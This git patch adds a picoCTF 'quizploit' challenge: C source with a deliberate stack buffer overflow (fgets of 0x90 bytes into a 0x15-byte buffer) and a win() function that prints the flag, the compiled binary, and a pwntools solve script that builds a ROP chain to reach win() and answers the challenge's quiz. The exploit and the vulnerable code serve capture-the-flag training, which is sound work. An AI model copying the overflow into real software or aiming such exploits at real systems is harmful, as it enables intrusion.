From 91c0fd7d662da34299ab047f3737165e5841d552 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Thu, 2 Jul 2026 07:27:35 +0900 Subject: [PATCH] pwn/quizploit --- pwn/quizploit/flag.txt | 1 + pwn/quizploit/solve.py | 70 +++++++++++++++++++++++++++++++++++++++++ pwn/quizploit/vuln | Bin 0 -> 16136 bytes pwn/quizploit/vuln.c | 24 ++++++++++++++ 4 files changed, 95 insertions(+) create mode 100644 pwn/quizploit/flag.txt create mode 100755 pwn/quizploit/solve.py create mode 100755 pwn/quizploit/vuln create mode 100644 pwn/quizploit/vuln.c diff --git a/pwn/quizploit/flag.txt b/pwn/quizploit/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/quizploit/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/quizploit/solve.py b/pwn/quizploit/solve.py new file mode 100755 index 0000000..6f8b33d --- /dev/null +++ b/pwn/quizploit/solve.py @@ -0,0 +1,70 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "lonely-island.picoctf.net 54976".split() + +def conn() -> remote: + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def answers(r: remote) -> None: + print('Q1') + r.sendlineafter(b">> ", b"64-bit") + print('Q2') + r.sendlineafter(b">> ", b"dynamic") + print('Q3') + r.sendlineafter(b">> ", b"not stripped") + print('Q4') + r.sendlineafter(b">> ", b"0x15") + print('Q5') + r.sendlineafter(b">> ", b"0x90") + print('Q6') + r.sendlineafter(b">> ", b"yes") + print('Q7') + r.sendlineafter(b">> ", b"fgets") + print('Q8') + r.sendlineafter(b">> ", b"win") + print('Q9') + r.sendlineafter(b">> ", b"buffer overflow") + print('Q10') + r.sendlineafter(b">> ", hex(0x90 - 0x15).encode()) + print('Q11') + r.sendlineafter(b">> ", b"NX") + print('Q12') + r.sendlineafter(b">> ", b"ROP") + print('Q13') + r.sendlineafter(b">> ", hex(exe.symbols['win']).encode()) + print('Q14') + result = r.recvline_contains(b"picoCTF{").decode().strip() + print(result) + r.close() + +def main() -> None: + + r = conn() + if args.REMOTE: + answers(r) + else: + offset = 40 + + rop = ROP(exe) + rop.raw(rop.generatePadding(0, offset)) + rop.raw(rop.ret.address) + rop.win() + r.sendline(rop.chain()) + + print(r.recvall().decode(), end='') + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/quizploit/vuln b/pwn/quizploit/vuln new file mode 100755 index 0000000000000000000000000000000000000000..41bc8d16acd98e17ae07cbad871fc122bf6236ab GIT binary patch literal 16136 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 +#include + +/* +This is not the challenge, just a template to answer the questions. +To get the flag, answer all the questions. +There are no bugs in the quiz. +There are 0xD questions in total. + +*/ + +void win(){ + system("cat flag.txt"); +} + +void vuln(){ + char buffer[0x15] = {0}; + fprintf(stdout, "\nEnter payload: "); + fgets(buffer, 0x90, stdin); +} + +void main(){ + vuln(); +}